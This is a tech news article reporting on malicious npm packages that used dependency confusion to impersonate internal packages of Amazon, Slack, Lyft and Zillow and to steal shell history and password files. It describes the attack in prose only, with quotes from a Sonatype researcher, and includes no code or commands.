Security researchers discovered that new malicious NPM packages target Amazon, Slack, Zillow, and Lyft code repositories and possibly stealing Linux and Unix password files. Experts also stated that they can open reverse shells back to the hackers.
(Photo : Photo by Quinn Rooney/Getty Images)
The Amazon website is seen on December 5, 2017 in Dandenong, Australia. Amazon has ended months of speculation by launching its local website overnight. The online retail giant has started taking orders and shipping products from its ‘fulfilment centre’ in Dandenong South, offering massive discounts on millions of items across more than 20 categories including electronics, toys, clothing, beauty and accessories.
According to Bleeping Computer‘s latest report, this newly discovered flaw was first discovered by Alex Birsan, the security researcher who won bug bounties from 35 companies. The expert was able to utilize a new flaw in open-source development tools.
Sonotype, a cybersecurity firm, said that the NPM packages contain malicious dependency confusion codes and that these malicious packages target the commonly use components companies such as Amazon, Slack, Lyft, and Zillow.
How the new NPM packages attack
The new malicious NPM packages also contain lyft-dataset-sdk, serverless-slack-app, zg-rentals, and amzn. Meanwhile, the dependency managers also use different packages, such as PyPI, RubyGems, and NPM, on the public repo rather than the company’s internal packages when building the application.
(Photo : Photo by Sean Gallup/Getty Images)
A worker prepares packages for delivery at an Amazon warehouse on September 4, 2014 in Brieselang, Germany. Germany is online retailer Amazon’s second largest market after the USA. Amazon is currently in a standoff with several book publishers over sales conditions and prices for e-books, and hundreds of authors in the US and Europe have written letters in support of the publishers.
Security researchers also explained that the new dependency confusion flaw allows different online attackers and cybercriminals to inject their own malicious code into an internal application in the supply-chain attack.
“I was starting to wonder when we were going to see a malicious actor take advantage of the current situation. Finally, we’ve spotted one,” said Juan Aguirre, a Sonatype security researcher, via Bleeping Computer.
“There is no scenario I can imagine where I’m going to submit a PoC for a bug bounty program that actually harms the organization. Taking their /etc/shadow file is definitely harmful,” he added.
Malicious NPM package’s main target
Security experts said that the new malicious NPM packages’ main packages are the companies’ Linux profiles “.bash_history” files. Once the hackers acquire this data, they will send it to a remote host under their control. Cybercriminals are currently targeting it since it contains a list of all the commands you typed in the shell, including passwords passed as arguments or texts. You can click here for more info.
For more news updates about new malicious codes used by different online attackers, always keep your tabs open here at TechTimes.
Related Article: Hackers Use ‘Gootloader’ Along with SEO Tactics to Deploy Malware on Websites, Debuting ‘Deoptimization’
This article is owned by TechTimes.
Written by: Giuliano de Leon.
ⓒ 2018 TECHTIMES.com All rights reserved. Do not reproduce without permission.